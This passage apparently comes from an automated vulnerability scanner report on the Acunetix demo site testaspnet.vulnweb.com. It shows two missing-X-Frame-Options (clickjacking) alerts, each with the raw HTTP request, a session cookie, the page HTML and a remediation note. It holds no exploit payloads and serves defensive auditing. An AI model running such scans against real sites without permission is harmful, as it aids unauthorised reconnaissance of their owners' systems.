href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site: if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        24. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (456 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Content-Length: 10985
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10985 bytes)
3sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ944e4UqgWJpySuZGYD9y7m9ZXo%2FQ%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30486
          
          
          Response body (30486 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        25. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Content-Length: 3761
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3761 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17924
          
          
          Response body (17924 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
